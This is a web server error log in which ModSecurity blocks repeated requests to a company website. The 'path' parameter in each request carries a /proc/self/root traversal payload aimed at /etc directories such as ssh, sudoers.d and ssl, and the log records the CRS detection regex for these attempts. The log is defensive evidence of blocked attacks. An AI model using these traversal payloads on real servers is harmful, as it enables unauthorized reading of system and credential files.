[Wed Mar 18 10:44:31.150953 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:49920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsPtY0UrI5A3LftIynswAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:32.635249 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:49928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsQEzinOy1jxa1j4cU8QAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:33.928754 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:49938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsQQkwaGbbGflqUZAQZAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:36.354336 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:49946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsRAkwaGbbGflqUZAQZgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:38.791054 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:49950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsRvu8EFLIOrSqIpsDnQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:40.293462 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:37798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsSPu8EFLIOrSqIpsDnwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:41.617325 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:37802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsScdf6f5d65gmYZTVNwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:42.949573 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:37806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsSimAPhZkrhU8w4lsUQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:44.340158 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:37822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsTOw_le52K8_3pV3fXwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:45.670050 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:37828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsTeyqAr6etmhZHNq_1AAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:46.242175 2026] [:error] [pid 15051:tid 140411716749056] [client 216.73.216.191:39319] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsTimAPhZkrhU8w4lsVAAAAIM"]
[Wed Mar 18 10:44:46.527403 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:38988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsTsdf6f5d65gmYZTVPQAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:46.943027 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:37842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsTsdf6f5d65gmYZTVPgAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:48.455419 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:37854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsUNa6ubjKNq_cu4aZnAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:49.783246 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:45134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsUUzinOy1jxa1j4cU_QAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:51.079188 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:45138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsU-w_le52K8_3pV3fawAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:52.736000 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:41308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsVOyqAr6etmhZHNq_4QAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:54.566403 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:45154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsVkzinOy1jxa1j4cVCgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:55.067805 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:41324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsV0zinOy1jxa1j4cVDAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:44:56.416950 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:41334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsWOoXxyEfFpUF8f9tTwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:44:58.089472 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:45156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsWvu8EFLIOrSqIpsDrQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:45:06.875009 2026] [:error] [pid 15826:tid 140411699963648] [client 216.73.216.191:31174] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsYeoXxyEfFpUF8f9tWQAAAUU"]
